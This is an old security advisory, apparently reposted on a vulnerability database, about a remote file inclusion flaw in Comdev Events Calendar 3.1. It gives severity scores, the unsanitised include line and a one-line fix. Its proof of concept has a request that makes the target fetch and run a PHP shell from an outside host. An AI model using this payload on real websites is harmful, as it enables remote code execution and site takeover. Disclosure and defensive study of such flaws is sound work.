Comdev Events Calendar 3.1 :) <= Remote File Inclusion

2006.10.03
Credit: rUnViRuS
Risk: High
Local: No
Remote: Yes
CWE: CWE-94


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

+-------------------------------------------------------------------- + + Comdev Events Calendar 3.1 :) <= Remote File Inclusion + +-------------------------------------------------------------------- + + Affected Software .: Comdev Events Calendar 3.1 + Venedor ...........: http://www.comdevweb.com + Class .............: Remote File Inclusion + Risk ..............: high (Remote File Execution) + Found by ..........: rUnViRuS + Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/ + Contact ...........: stormhacker[at]hotmail[.]com + +-------------------------------------------------------------------- + + Code include.php: + + ..... + include($path["docroot"]."common/wce.login.php"); + ..... + +-------------------------------------------------------------------- + + $path["docroot"] is not properly sanitized before being used. + The bug is in the "Comdev CSV Importer" Package for Comdev CSV Importer. + +-------------------------------------------------------------------- + + Solution: + Add this line to your php-file: + + $path["docroot"] ="user/dir" //Your root path + +-------------------------------------------------------------------- + PoC: + Place a PHPShell on a remote location: + http://wdzone.net/sh.txt? + + + http://[target]/include.php?path["docroot"]=http://phpshell + +-------------------------------------------------------------------- + [W]orld [D]efacers [T]eam + Greets: + || rUnViRuS || - || papipsycho || - || HeX || - || Linux Master || BLaCKWHITE || + || Pro Hacker || + +-------------------------[ W D T ]----------------------------------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top